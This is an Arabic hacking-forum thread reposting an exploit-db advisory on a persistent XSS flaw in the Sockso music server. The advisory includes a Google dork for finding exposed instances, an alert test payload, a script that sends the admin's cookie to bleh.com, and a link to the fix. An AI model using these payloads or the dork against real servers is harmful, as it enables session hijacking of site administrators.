اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ثغره جديده { Sockso <=1.51 Persistent XSS }

ثغره جديده { Sockso <=1.51 Persistent XSS }


النتائج 1 إلى 3 من 3

الموضوع: ثغره جديده { Sockso <=1.51 Persistent XSS }

  1. #1
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    Gadid ثغره جديده { Sockso <=1.51 Persistent XSS }



    السلام عليكم و رحمة الله و بركاته

    ################################################## #####################

    Application: Sockso
    http://sockso.pu-gh.com
    Versions: <= 1.5
    Platforms: Windows, Mac, Linux
    Bug: Persistant XSS
    Exploitation: remote
    Date: 11 May 2012.
    Author: Ciaran McNally
    Web: http://smwyg.com/blog/#sockso-persistant-xss-attack

    Google Dork: inurl:"4444" sockso

    ################################################## #####################

    1) Bug.
    2) The exploit.
    3) Fix.

    ################################################## #####################
    Sockso is a free, open-source, personal music host server for
    everyone! It's designed to be as simple as possible so that anyone with
    a mouse and some mp3's can get their friends listening to their music
    across the internet in seconds!"
    ################################################## #####################

    ======
    1) Bug
    ======

    On Registration page (normally @ "4444/user/register") the username
    input is never sanitized. This is then stored in the database of users
    and displayed in the admin panel & user pages.

    ################################################## #####################

    ==============
    2) The exploit
    ==============

    Using a username value of...

    **********alert('xss');</script>

    Or the admin cookie session can also be retrieved by using...

    <script >new Image().src="bleh.com/xss.php?c="+encodeURI(document.cookie)</script>


    ################################################## #####################

    ======
    3) Fix
    ======

    https://github.com/rodnaph/sockso/pull/99/files


    ################################################## #####################


    رابط الثغره : http://www.exploit-db.com/exploits/18868


    تحياتي



  2. #2
    :: مشرف قسم الباك تراك :: Array الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغره جديده { Sockso <=1.51 Persistent XSS }

    كل الشكر والعرفان لك .. على مواضيعك الثمينة ...
    حتى لو لم اصل لهذا المستوى من العلم ...
    بآلتوفيق عزيزى


  3. #3
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    افتراضي رد: ثغره جديده { Sockso <=1.51 Persistent XSS }

    [
    كل الشكر والعرفان لك .. على مواضيعك الثمينة ...
    حتى لو لم اصل لهذا المستوى من العلم ...
    بآلتوفيق عزيزى

    تسلم يآ غالي

    أشكركـ على مروركـ

    تحياتي



المواضيع المتشابهه

  1. ثغره جديده { Galette (picture.php) SQL Injection Vulnerability }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 05-24-2012, 10:36 AM
  2. ثغره جديده..مش عارف إزاى أوصلها..
    بواسطة black_dream في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 05-14-2012, 06:50 PM
  3. ثغره جديده اسمها vbulletin_md5
    بواسطة kapos في المنتدى قسم الثغرات
    مشاركات: 15
    آخر مشاركة: 01-11-2012, 11:15 AM
  4. ثغره جديده بالتنسيق الشعري
    بواسطة وحـThuGـش في المنتدى منتدى حماية المواقع والمنتديات
    مشاركات: 4
    آخر مشاركة: 11-27-2011, 04:01 PM
  5. ثغره جديده للمتصفح 7 Remote Code Execution
    بواسطة Spy4Man في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 08-24-2010, 06:43 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرة الياهو xss الجديدة

xss ثغرة

تفاصيل عن ثغرة فى الياهوxss

دورك ثغرة xxs

دورة xss

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •